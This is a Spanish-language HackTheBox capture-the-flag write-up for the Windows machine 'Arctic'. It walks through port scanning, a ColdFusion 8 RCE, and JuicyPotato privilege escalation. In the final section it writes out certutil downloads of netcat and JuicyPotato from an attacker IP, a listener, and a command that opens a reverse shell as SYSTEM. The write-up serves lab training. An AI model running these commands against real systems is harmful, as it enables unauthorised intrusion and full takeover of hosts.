Arctic

Publicado: 15 de Junio de 2025 Autor: José Miguel Romero aKa x3m1Sec Dificultad: ⭐ Easy
📝 Descripción
Arctic es una máquina Windows de nivel fácil de HackTheBox que ejecuta Adobe ColdFusion 8, un servidor de aplicaciones web vulnerable. La explotación inicial se realiza aprovechando una vulnerabilidad de ejecución remota de código (RCE) en ColdFusion 8, que nos permite obtener acceso como usuario de bajo privilegio. La escalada de privilegios se logra mediante el exploit JuicyPotato, aprovechando el privilegio SeImpersonatePrivilege en Windows Server 2008.
Puntos clave de aprendizaje:
Enumeración de servicios web no estándar
Explotación de Adobe ColdFusion 8 RCE
Escalada de privilegios con JuicyPotato
Uso del privilegio SeImpersonatePrivilege
🔭 Reconocimiento
🏓 Ping para verificación en base a TTL
❯ ping -c2 10.10.10.11
PING 10.10.10.11 (10.10.10.11) 56(84) bytes of data.
64 bytes from 10.10.10.11: icmp_seq=1 ttl=127 time=47.0 ms
64 bytes from 10.10.10.11: icmp_seq=2 ttl=127 time=45.5 ms
--- 10.10.10.11 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1017ms
rtt min/avg/max/mdev = 45.473/46.221/46.970/0.748 ms
💡 Nota: El TTL cercano a 128 sugiere que probablemente sea una máquina Windows.
🚀 Escaneo de puertos
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.11 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//)
echo $ports
135,8500,49154
🔍 Enumeración de servicios
nmap -sC -sV -p$ports 10.10.10.11 -oN services.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 20:27 CEST
Nmap scan report for 10.10.10.11
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Puertos identificados:
135/tcp: Microsoft Windows RPC
8500/tcp: Servicio desconocido (fmtp?)
49154/tcp: Microsoft Windows RPC
🌐 Enumeración Web
🔥 Puerto 8500 - Adobe ColdFusion
La enumeración con nmap no deja claro qué tipo de servicio es, pero al acceder a él como si de un servicio http se tratase vemos que lo carga correctamente aunque con bastante lentitudy vemos lo siguiente

Al ingresar al directorio CFIDE vemos el siguiente árbol de directorios

🔐 Panel de administración ColdFusion
Al acceder a "administrator" vemos que somos redirigidos a un panel de login de un servicio de Adobe ColdFusion 8: http://10.10.10.11:8500/CFIDE/administrator/
http://10.10.10.11:8500/CFIDE/administrator/

Las credenciales por defecto no parecen funcionar. Pero buscando exploits públicos para la versión de este servicio encontramos un exploit en python que permite explotar una RCE:
💥 Explotación
🎯 Búsqueda de exploits

🚀 Configuración del exploit
Una vez descargado el exploit deberemos definir los parámetros correspondientes al host que contiene el servicio vulnerable así como la ip y el puerto de nuestro host de ataque donde recibiremos la reverse shell:


🎉 Acceso inicial
Ganamos acceso al host remoto como usuario tolis:

⬆️ Escalada de privilegios
Al enumerar los privilegios del usuario Solis vemos que tiene el privilegio SeImpersonatePrivilege habilitado:

🥔 JuicyPotato Exploit
Dado que se trata de un Windows Server 2008 podemos usar JuicyPotato para escalar privilegios como NT System:

Descargamos y transferimos netcat y el exploit de JuicyPotato a la máquina Windows Server
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
C:\>mkdir Temp
mkdir Temp
C:\>cd Temp
cd TEmp
C:\Temp>mkdir Privesc
mkdir Privesc
certutil -urlcache -f -split http://10.10.14.7/nc.exe
certutil -urlcache -f -split http://10.10.14.7/JP.exe
Iniciamos un listener en nuestro host de ataque:
nc -nlvp 443
🚀 Ejecución del exploit
Ejecutamos el exploit JuicyPotato usando netcat para establecer una reverse shell con nuestro host de ataque:
JP.exe -t * -p C:\Windows\System32\cmd.exe -l 1337 -a "/c C:\Temp\Privesc\nc.exe -e cmd 10.10.14.7 443"

Recibimos inmediatamente la reverse shell en nuestro host de ataque como NT System y obtenemos la flag:

Last updated